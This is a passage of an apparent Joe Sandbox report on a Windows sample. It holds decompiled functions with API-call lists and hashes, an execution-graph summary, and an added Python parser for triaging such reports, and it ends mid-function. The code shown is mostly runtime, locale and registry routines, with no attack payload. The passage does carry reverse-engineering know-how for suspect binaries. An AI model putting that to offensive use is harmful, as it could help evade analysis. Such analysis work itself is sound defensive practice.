      • Instruction ID: 91f40d2cd70bc5a9aab90e0aff554304266befa7419b4cae15c997e47de9a87b
      • Opcode Fuzzy Hash: dc6517d4dfbdfac82f8209bf9620c28f6987fdcef5aef1f1727908ec017e539b
      • Instruction Fuzzy Hash: 2C0171B1E00319AFDB00EBACDD86BDEB7E8AB08714F500126FA14E7291DB709D4497B5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 66%
      			E009B1D72(intOrPtr __ebx, void* __ecx) {
      				signed int _v8;
      				char _v20;
      				char _v280;
      				void* __edi;
      				void* __esi;
      				signed int _t9;
      				long _t12;
      				intOrPtr _t13;
      				intOrPtr _t19;
      				intOrPtr _t24;
      				intOrPtr _t25;
      				intOrPtr _t29;
      				signed int _t34;
      
      				_t19 = __ebx;
      				_t32 = _t34;
      				_t9 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t9 ^ _t34;
      				_t12 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
      				if(_t12 == 0) {
      					L4:
      					_t13 = 0;
      					__eflags = 0;
      				} else {
      					_t38 = _t12 - 0x104;
      					if(_t12 == 0x104) {
      						goto L4;
      					} else {
      						 *(PathFindExtensionA( &_v280)) = 0;
      						asm("movsd");
      						asm("movsd");
      						asm("movsb");
      						_t13 = E009B1BA3( &_v280, _t38,  &_v20,  &_v280);
      						_t25 = _t25;
      					}
      				}
      				_pop(_t29);
      				return E00AAB46A(_t13, _t19, _v8 ^ _t32, _t24, _t25, _t29);
      			}

      Statement addresses (listing order; 0x00000000 where the decompiler assigned no address): 0x009b1d72, 0x009b1d75, 0x009b1d7d, 0x009b1d84, 0x009b1d9a, 0x009b1da2, 0x009b1dd7, 0x009b1dd7, 0x009b1dd7, 0x009b1da4, 0x009b1da4, 0x009b1da6, 0x00000000, 0x009b1da8, 0x009b1db6, 0x009b1dc1, 0x009b1dc8, 0x009b1dce, 0x009b1dcf, 0x009b1dd4, 0x009b1dd4, 0x009b1da6, 0x009b1dde, 0x009b1de5

      APIs
      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 009B1D9A
      • PathFindExtensionA.SHLWAPI(?), ref: 009B1DB0
        • Part of subcall function 009B1BA3: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 009B1BE8
        • Part of subcall function 009B1BA3: _memset.LIBCMT ref: 009B1C14
        • Part of subcall function 009B1BA3: _wcstoul.LIBCMT ref: 009B1C5C
        • Part of subcall function 009B1BA3: _wcslen.LIBCMT ref: 009B1C7D
        • Part of subcall function 009B1BA3: GetUserDefaultUILanguage.KERNEL32 ref: 009B1C8D
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CB4
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CC3
        • Part of subcall function 009B1BA3: GetSystemDefaultUILanguage.KERNEL32 ref: 009B1CCC
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CE8
        • Part of subcall function 009B1BA3: ConvertDefaultLocale.KERNEL32(?), ref: 009B1CF7
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Default$ConvertLocale$Language$AddressExtensionFileFindModuleNamePathProcSystemUser_memset_wcslen_wcstoul
      • String ID: %s%s.dll
      • API String ID: 1415830068-1649984862
      • Opcode ID: 9d4bc44fb303eb7ad5b3d628ff456df3fe371ddae20f49f18ffcc474369bc51f
      • Instruction ID: 3d6c0ec538e50cc0317814ff98fe50629288dc2528dbfed3cfe2ab0dd0a28eea
      • Opcode Fuzzy Hash: 9d4bc44fb303eb7ad5b3d628ff456df3fe371ddae20f49f18ffcc474369bc51f
      • Instruction Fuzzy Hash: B801A47290111CABCB14DB68ED56BEF77FCAB89710F4104A5A506E7150EB709E448BA0
      Uniqueness

      Uniqueness Score: -1.00%
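Every function block on this page has the same layout: a decompiled body under a "C-Code - Quality" header, an APIs list in which "Part of subcall function" entries are calls one level down the call tree, an optional Strings list with xrefs, and a Similarity section whose Opcode ID names the function body independently of its load address. As an added example that is not part of the Joe Sandbox report or its tooling, the Python below parses that layout into per-function records and pulls out what a triage pass wants first: the APIs each function calls directly, the symbol names it resolves at run time through GetProcAddress (on this page DllGetVersion in E009C2683, and GetThreadPreferredUILanguages reached through subcall 009B1BA3 in E009B1D72), and its string xrefs. SAMPLE_REPORT is a constructed excerpt copied from three blocks on this page and trimmed to the fields the parser reads; the section names and line regexes are assumptions about the report as rendered here, not a documented Joe Sandbox schema.

```python
"""Parse the per-function metadata blocks of a Joe Sandbox report into triage
records.  Added example, not part of the Joe Sandbox report or its tooling.
SAMPLE_REPORT is a constructed excerpt copied from three blocks on this page
(E009C2683, E009B1D72, E009A29E0), trimmed to the fields parsed here."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_REPORT = """\
C-Code - Quality: 43%
    E009C2683(void* __ecx, intOrPtr __edx, intOrPtr __edi) {
    }
APIs
• GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 009C26B6
Strings
Similarity
• String ID: DllGetVersion
• Opcode ID: dc6517d4dfbdfac82f8209bf9620c28f6987fdcef5aef1f1727908ec017e539b
C-Code - Quality: 66%
    E009B1D72(intOrPtr __ebx, void* __ecx) {
    }
APIs
• GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 009B1D9A
• PathFindExtensionA.SHLWAPI(?), ref: 009B1DB0
  • Part of subcall function 009B1BA3: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 009B1BE8
Similarity
• String ID: %s%s.dll
C-Code - Quality: 100%
    E009A29E0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    }
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 009A29F6
  • Part of subcall function 00AC6214: __CxxThrowException@8.LIBCMT ref: 00AC623E
• _memmove.LIBCMT ref: 009A2A2F
Strings
• invalid string position, xrefs: 009A29F1
Similarity
• String ID: invalid string position
"""

@dataclass
class ApiRef:
    name: str                   # e.g. "GetProcAddress"
    library: str                # e.g. "KERNEL32"
    args: list                  # argument column as the report renders it; [] if absent
    ref: Optional[str]          # call-site address, e.g. "009C26B6"
    via_subcall: Optional[str]  # callee address for "Part of subcall function" entries

@dataclass
class FunctionBlock:
    name: str = ""
    quality: int = 0
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (string, xref address)
    fields: dict = field(default_factory=dict)   # Similarity section, e.g. "Opcode ID"

    def direct_apis(self):
        return [a.name for a in self.apis if a.via_subcall is None]

# Line shapes as rendered on this page (assumptions, not a documented schema).
_QUALITY_RE = re.compile(r"^C-Code - Quality:\s*(\d+)%")
_FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(")
_API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-F]{8}):\s*)?"
                     r"([\w:@]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?(?:,?\s*ref:\s*([0-9A-F]{8}))?")
_STRING_RE = re.compile(r"^•\s*(.*?),\s*xrefs:\s*([0-9A-F]{8})$")
_FIELD_RE = re.compile(r"^•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                       r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")
_SECTIONS = {"APIs": "apis", "Strings": "strings", "Similarity": "similarity",
             "Memory Dump Source": None, "Joe Sandbox IDA Plugin": None,
             "Yara matches": None, "Uniqueness": None}

def parse_report(text):
    """One FunctionBlock per 'C-Code - Quality' header, in report order."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := _QUALITY_RE.match(line)):
            cur = FunctionBlock(quality=int(m.group(1)))
            blocks.append(cur)
            section = None
        elif cur is None:
            continue
        elif line in _SECTIONS:
            section = _SECTIONS[line]
        elif not cur.name:                 # first line after the header is the signature
            if (m := _FUNC_RE.match(line)):
                cur.name = m.group(1)
        elif section == "apis" and (m := _API_RE.match(line)):
            sub, name, lib, args, ref = m.groups()
            argv = [] if args is None else [a.strip() for a in args.split(",")]
            cur.apis.append(ApiRef(name, lib, argv, ref, sub))
        elif section == "strings" and (m := _STRING_RE.match(line)):
            cur.strings.append((m.group(1), m.group(2)))
        elif section == "similarity" and (m := _FIELD_RE.match(line)):
            cur.fields[m.group(1)] = m.group(2).strip()
    return blocks

def dynamic_imports(block):
    """(symbol, subcall address or None) for each GetProcAddress whose lpProcName the
    sandbox recovered; '?' or 00000000 in that column means it did not."""
    return [(a.args[1], a.via_subcall) for a in block.apis
            if a.name == "GetProcAddress" and len(a.args) > 1
            and a.args[1] not in ("?", "00000000")]

def index_by_opcode_id(blocks):
    """Opcode ID -> function name; the ID is address-independent, so it matches the
    same function across reports of related samples."""
    return {b.fields["Opcode ID"]: b.name for b in blocks if "Opcode ID" in b.fields}
```

Run it over a full report export and diff `index_by_opcode_id` against an earlier sample's report to see which function bodies are unchanged; `dynamic_imports` is the quick list of names the binary resolves outside its import table, which is where the interesting calls in a packed or evasive sample tend to live.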

      C-Code - Quality: 100%
      			E009C2A0C(signed int _a4) {
      				void* __ebp;
      				struct _CRITICAL_SECTION* _t4;
      				void* _t8;
      				signed int _t9;
      				intOrPtr* _t12;
      
      				_t9 = _a4;
      				if(_t9 >= 0x11) {
      					_t4 = E009B8782(_t8);
      				}
      				if( *0xd0ffe8 == 0) {
      					_t4 = E009C29A3();
      				}
      				_t12 = 0xd101a0 + _t9 * 4;
      				if( *_t12 == 0) {
      					EnterCriticalSection(0xd10188);
      					if( *_t12 == 0) {
      						_t4 = 0xd0fff0 + _t9 * 0x18;
      						InitializeCriticalSection(_t4);
      						 *_t12 =  *_t12 + 1;
      					}
      					LeaveCriticalSection(0xd10188);
      				}
      				EnterCriticalSection(0xd0fff0 + _t9 * 0x18);
      				return _t4;
      			}

      Statement addresses (listing order): 0x009c2a14, 0x009c2a1a, 0x009c2a1c, 0x009c2a1c, 0x009c2a28, 0x009c2a2a, 0x009c2a2a, 0x009c2a35, 0x009c2a3f, 0x009c2a46, 0x009c2a4b, 0x009c2a52, 0x009c2a58, 0x009c2a5e, 0x009c2a5e, 0x009c2a65, 0x009c2a65, 0x009c2a75, 0x009c2a7b

      APIs
      • EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
      • LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
      • EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
      • String ID:
      • API String ID: 3253506028-0
      • Opcode ID: e76e5e34c63d338b27f823262b539ae6502322aefbbd36f24c296883cfec9c0d
      • Instruction ID: 3c01899446934bcee7d19a7f5d6e7c53dd4e729ac7474d9d15b3f939ec7acf85
      • Opcode Fuzzy Hash: e76e5e34c63d338b27f823262b539ae6502322aefbbd36f24c296883cfec9c0d
      • Instruction Fuzzy Hash: 05F0C272A00206BFC7206B99EC49B59BB59EFD1351F24002AF04487192CF7499C5C6B6
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009BC85D(long* __ecx, signed int _a4) {
      				void* _t9;
      				struct _CRITICAL_SECTION* _t12;
      				signed int _t14;
      				long* _t16;
      
      				_t16 = __ecx;
      				_t1 =  &(_t16[7]); // 0x1c
      				_t12 = _t1;
      				EnterCriticalSection(_t12);
      				_t14 = _a4;
      				if(_t14 <= 0 || _t14 >= _t16[3]) {
      					L5:
      					LeaveCriticalSection(_t12);
      					return 0;
      				} else {
      					_t9 = TlsGetValue( *_t16);
      					if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
      						goto L5;
      					} else {
      						LeaveCriticalSection(_t12);
      						return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
      					}
      				}
      			}

      Statement addresses (listing order; 0x00000000 where the decompiler assigned no address): 0x009bc864, 0x009bc867, 0x009bc867, 0x009bc86b, 0x009bc871, 0x009bc876, 0x009bc89f, 0x009bc8a0, 0x00000000, 0x009bc87d, 0x009bc87f, 0x009bc887, 0x00000000, 0x009bc88e, 0x009bc895, 0x00000000, 0x009bc89b, 0x009bc887

      APIs
      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC86B
      • TlsGetValue.KERNEL32(00000000,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC87F
      • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC895
      • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,009BCE24,?,00000004,009BD78E,009AB424,009B0613,?,009AB86C,?,009A8EAA,00000004), ref: 009BC8A0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Leave$EnterValue
      • String ID:
      • API String ID: 3969253408-0
      • Opcode ID: de07460498d1bb5793463ef133fbf80058b57865e9c15b7780b43e436e31832c
      • Instruction ID: c765486f1d34ef221e832b1aff1967e271b38af3614101f33643ca7a8b0ec8a4
      • Opcode Fuzzy Hash: de07460498d1bb5793463ef133fbf80058b57865e9c15b7780b43e436e31832c
      • Instruction Fuzzy Hash: 1DF082B6200204AFC7209FA8ED8CDAB77ADEFC437131A5866F506D7111DA70F846CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage: 3.2%
      Dynamic/Decrypted Code Coverage: 0%
      Signature Coverage: 1.3%
      Total number of Nodes: 1126
      Total number of Limit Nodes: 28
Execution graph (interactive call-graph widget in the original report; node and edge data omitted here)

Recoverable information from the graph: it covers two code regions, the sample's own 32-bit image (functions in the 0x402xxx to 0x48dxxx range) and a second image mapped around 0x6ed91000 to 0x6eda4e00. API calls named on graph nodes, grouped by area:

- Window/UI (sample image): NtdllDefWindowProc_A, IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, IsWindowEnabled, IsWindowVisible, LoadIconA, LoadCursorA, SystemParametersInfoA, GetStockObject, CreateFontIndirectA, GetObjectA, GetSystemMetrics, GetClassInfoA, RegisterClassA, CreateWindowExA, SetWindowLongA, SetClassLongA, GetSystemMenu, DeleteMenu, RegisterClipboardFormatA, GlobalAddAtomA, GetKeyboardLayout, GetKeyboardLayoutList, GetSystemDefaultLangID, SetThreadLocale, OemToCharA, CharNextA, CharLowerA
- Loader/process (sample image): GetModuleHandleA, GetModuleFileNameA, GetProcAddress, LoadLibraryA, SetErrorMode, VirtualAlloc, GetVersion, GetCurrentProcessId, GetCurrentThreadId, OutputDebugStringA, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, KiUserCallbackDispatcher, StarBurn_GetVersion
- Registry (sample image): RegOpenKeyExA, RegQueryValueExA, RegCloseKey
- Second image (0x6ed9xxxx): GetModuleHandleA, GetModuleFileNameA, lstrcpyA, lstrcatA, lstrcpynA, VirtualProtect, CreateThread, CloseHandle, Sleep, CoInitialize, CoCreateInstance, CoUninitialize, MultiByteToWideChar, CreateFileA, GetFileType, ReadFile, SetFilePointer, FindCloseChangeNotification, RtlAllocateHeap, RtlEncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetLastError, GetModuleHandleW, ExitProcess, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, plus MSVC CRT internals (__getptd_noexit, __lseeki64, __lock_file, std::exception, __CxxThrowException)

The graph data is truncated at the end of this section.
LocalAlloc 47904->47905 47906 401c83 47905->47906 47907 401ce3 47906->47907 47908 401cd9 RtlLeaveCriticalSection 47906->47908 47907->47894 47908->47907 47912 402347 47909->47912 47910 402388 47914 4023af 47910->47914 47920 4020c8 9 API calls 47910->47920 47912->47910 47912->47914 47915 402298 47912->47915 47914->47898 47914->47899 47921 40199c 47915->47921 47917 4022a8 47918 4022b5 47917->47918 47930 40220c 9 API calls 47917->47930 47918->47912 47920->47914 47924 4019ba 47921->47924 47923 4019c8 47931 401820 47923->47931 47924->47923 47927 4019d6 47924->47927 47928 401a28 47924->47928 47935 40167c 47924->47935 47943 401530 LocalAlloc 47924->47943 47927->47917 47944 401758 VirtualFree 47928->47944 47930->47918 47933 401873 47931->47933 47932 4018c2 47932->47927 47933->47932 47934 4018a9 VirtualAlloc 47933->47934 47934->47932 47934->47933 47936 40168b VirtualAlloc 47935->47936 47938 4016b8 47936->47938 47939 4016db 47936->47939 47945 4014a0 LocalAlloc 47938->47945 47939->47924 47941 4016c4 47941->47939 47942 4016c8 VirtualFree 47941->47942 47942->47939 47943->47924 47944->47927 47945->47941 47946->47708 47947->47712 47948->47709 47949->47713 47951->47706 47953 40618e 47952->47953 47954 40614e RegOpenKeyExA 47952->47954 47970 405f34 12 API calls 47953->47970 47954->47953 47955 40616c RegOpenKeyExA 47954->47955 47955->47953 47957 406217 lstrcpyn GetThreadLocale GetLocaleInfoA 47955->47957 47959 406347 47957->47959 47960 40624e 47957->47960 47958 4061b3 RegQueryValueExA 47961 4061d3 RegQueryValueExA 47958->47961 47962 4061f1 RegCloseKey 47958->47962 47959->47719 47960->47959 47963 40625e lstrlen 47960->47963 47961->47962 47962->47719 47965 406277 47963->47965 47965->47959 47966 4062d1 47965->47966 47967 4062a5 lstrcpyn LoadLibraryExA 47965->47967 47966->47959 47968 4062db lstrcpyn LoadLibraryExA 47966->47968 47967->47966 47968->47959 47969 406311 lstrcpyn LoadLibraryExA 47968->47969 47969->47959 47970->47958 47971 6ed975c6 47972 6ed975d1 ___security_init_cookie 
47971->47972 47973 6ed975d6 47971->47973 47972->47973 47976 6ed974d0 47973->47976 47975 6ed975e4 47977 6ed974dc 47976->47977 47981 6ed97579 47977->47981 47982 6ed97529 47977->47982 47984 6ed9736c 47977->47984 47979 6ed97559 47980 6ed9736c __CRT_INIT@12 84 API calls 47979->47980 47979->47981 47980->47981 47981->47975 47982->47979 47982->47981 47983 6ed9736c __CRT_INIT@12 84 API calls 47982->47983 47983->47979 47985 6ed97378 47984->47985 47986 6ed973fa 47985->47986 47987 6ed97380 47985->47987 47988 6ed9745b 47986->47988 47989 6ed97400 47986->47989 48025 6ed98fc1 HeapCreate 47987->48025 47992 6ed974b9 47988->47992 47993 6ed97460 47988->47993 47994 6ed9741e 47989->47994 48000 6ed97389 47989->48000 48090 6ed96a4b 10 API calls _doexit 47989->48090 47991 6ed97385 47991->48000 48026 6ed98473 GetModuleHandleW 47991->48026 47992->48000 48077 6ed98405 47992->48077 48074 6ed9811e TlsGetValue 47993->48074 47999 6ed97423 __ioterm __mtterm 47994->47999 47994->48000 48091 6ed98fdf HeapDestroy 47999->48091 48000->47982 48002 6ed97395 48005 6ed97399 48002->48005 48006 6ed973a0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 48002->48006 48088 6ed98fdf HeapDestroy 48005->48088 48046 6ed99198 GetStartupInfoW 48006->48046 48009 6ed9747d DecodePointer 48012 6ed97492 48009->48012 48015 6ed974ad 48012->48015 48016 6ed97496 48012->48016 48013 6ed973ca __setargv 48017 6ed973f3 __ioterm 48013->48017 48018 6ed973d3 48013->48018 48014 6ed973c3 __mtterm 48014->48005 48098 6ed96256 11 API calls 2 library calls 48015->48098 48021 6ed9749d GetCurrentThreadId 48016->48021 48017->48014 48059 6ed9b2e7 48018->48059 48021->48000 48024 6ed973e3 48024->48000 48024->48017 48025->47991 48027 6ed98490 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 48026->48027 48028 6ed98487 __mtterm 48026->48028 48030 6ed984da TlsAlloc 48027->48030 48028->48002 48031 6ed985e9 48030->48031 48032 6ed98528 TlsSetValue 48030->48032 48031->48002 48032->48031 48033 6ed98539 48032->48033 48099 6ed967f1 
__initp_misc_winsig RtlEncodePointer __init_pointers _doexit 48033->48099 48035 6ed9853e EncodePointer EncodePointer EncodePointer EncodePointer 48036 6ed9857d 48035->48036 48037 6ed98581 DecodePointer 48036->48037 48038 6ed985e4 __mtterm 48036->48038 48039 6ed98596 48037->48039 48038->48031 48039->48038 48040 6ed99841 __calloc_crt 11 API calls 48039->48040 48041 6ed985ac 48040->48041 48041->48038 48042 6ed985b4 DecodePointer 48041->48042 48043 6ed985c5 48042->48043 48043->48038 48044 6ed985c9 48043->48044 48045 6ed985d1 GetCurrentThreadId 48044->48045 48045->48031 48047 6ed99841 __calloc_crt 11 API calls 48046->48047 48057 6ed991b6 48047->48057 48048 6ed99361 GetStdHandle 48054 6ed9932b 48048->48054 48049 6ed993c5 SetHandleCount 48051 6ed973bf 48049->48051 48050 6ed99841 __calloc_crt 11 API calls 48050->48057 48051->48013 48051->48014 48052 6ed99373 GetFileType 48052->48054 48053 6ed992ab 48053->48054 48055 6ed992e2 InitializeCriticalSectionAndSpinCount 48053->48055 48056 6ed992d7 GetFileType 48053->48056 48054->48048 48054->48049 48054->48052 48058 6ed99399 InitializeCriticalSectionAndSpinCount 48054->48058 48055->48051 48055->48053 48056->48053 48056->48055 48057->48050 48057->48051 48057->48053 48057->48054 48057->48057 48058->48051 48058->48054 48060 6ed9b2f0 ___initmbctable 48059->48060 48062 6ed9b2f5 _strlen 48059->48062 48060->48062 48061 6ed973d8 48061->48017 48089 6ed96848 11 API calls 2 library calls 48061->48089 48062->48061 48063 6ed99841 __calloc_crt 11 API calls 48062->48063 48065 6ed9b32a _strlen 48063->48065 48064 6ed9b379 48101 6ed96256 11 API calls 2 library calls 48064->48101 48065->48061 48065->48064 48067 6ed99841 __calloc_crt 11 API calls 48065->48067 48068 6ed9b39f 48065->48068 48071 6ed9b3b6 48065->48071 48100 6ed98948 17 API calls __lseeki64 48065->48100 48067->48065 48102 6ed96256 11 API calls 2 library calls 48068->48102 48072 6ed98755 __invoke_watson 5 API calls 48071->48072 48073 6ed9b3c2 48072->48073 48075 6ed97465 48074->48075 48076 
6ed98133 RtlDecodePointer TlsSetValue 48074->48076 48092 6ed99841 48075->48092 48076->48075 48078 6ed9845e 48077->48078 48079 6ed98413 48077->48079 48080 6ed98468 TlsSetValue 48078->48080 48081 6ed98471 48078->48081 48082 6ed98419 TlsGetValue 48079->48082 48083 6ed98440 RtlDecodePointer 48079->48083 48080->48081 48081->48000 48084 6ed9842c TlsGetValue 48082->48084 48085 6ed9843c 48082->48085 48086 6ed98456 48083->48086 48084->48085 48085->48083 48103 6ed982d6 16 API calls 2 library calls 48086->48103 48088->48000 48089->48024 48090->47994 48091->48000 48094 6ed9984a 48092->48094 48095 6ed97471 48094->48095 48096 6ed99868 Sleep 48094->48096 48104 6ed9d81f 48094->48104 48095->48000 48095->48009 48097 6ed9987d 48096->48097 48097->48094 48097->48095 48098->48000 48099->48035 48100->48065 48101->48061 48102->48061 48103->48078 48105 6ed9d82b 48104->48105 48111 6ed9d846 48104->48111 48106 6ed9d837 48105->48106 48105->48111 48112 6ed987f9 11 API calls __getptd_noexit 48106->48112 48108 6ed9d859 RtlAllocateHeap 48110 6ed9d880 48108->48110 48108->48111 48109 6ed9d83c 48109->48094 48110->48094 48111->48108 48111->48110 48112->48109

      Control-flow Graph

      C-Code - Quality: 65%
      			E0040610C(intOrPtr __eax) {
      				intOrPtr _v8;
      				void* _v12;
      				char _v15;
      				char _v17;
      				char _v18;
      				char _v22;
      				int _v28;
      				char* _v32;
      				char _v293;
      				long _t58;
      				long _t75;
      				long _t77;
      				CHAR* _t84;
      				CHAR* _t87;
      				struct HINSTANCE__* _t94;
      				struct HINSTANCE__* _t101;
      				struct HINSTANCE__* _t110;
      				intOrPtr _t115;
      				void* _t124;
      				void* _t126;
      				intOrPtr _t127;
      
      				_t124 = _t126;
      				_t127 = _t126 + 0xfffffedc;
      				_v8 = __eax;
      				GetModuleFileNameA(0,  &_v293, 0x105);
      				_v22 = 0;
      				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
      				if(_t58 == 0) {
      					L3:
      					_push(_t124);
      					_push(0x406210);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t127;
      					_v28 = 5;
      					E00405F34( &_v293, 0x105);
      					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040638C, 0, 0,  &_v22,  &_v28) != 0) {
      						_v22 = 0;
      					}
      					_v18 = 0;
      					_pop(_t115);
      					 *[fs:eax] = _t115;
      					_push(E00406217);
      					return RegCloseKey(_v12);
      				} else {
      					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
      					if(_t75 == 0) {
      						goto L3;
      					} else {
      						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
      						if(_t77 != 0) {
      							_push(0x105);
      							_push(_v8);
      							_push( &_v293);
      							L00401338();
      							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
      							_t110 = 0;
      							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
      								_t84 =  &_v293;
      								_push(_t84);
      								L00401340();
      								_v32 = _t84 +  &_v293;
      								while( *_v32 != 0x2e &&  &_v293 != _v32) {
      									_v32 = _v32 - 1;
      								}
      								_t87 =  &_v293;
      								if(_t87 != _v32) {
      									_v32 = _v32 + 1;
      									if(_v22 != 0) {
      										_push(0x105 - _v32 - _t87);
      										_push( &_v22);
      										_push(_v32);
      										L00401338();
      										_t110 = LoadLibraryExA( &_v293, 0, 2);
      									}
      									if(_t110 == 0 && _v17 != 0) {
      										_push(0x105 - _v32 -  &_v293);
      										_push( &_v17);
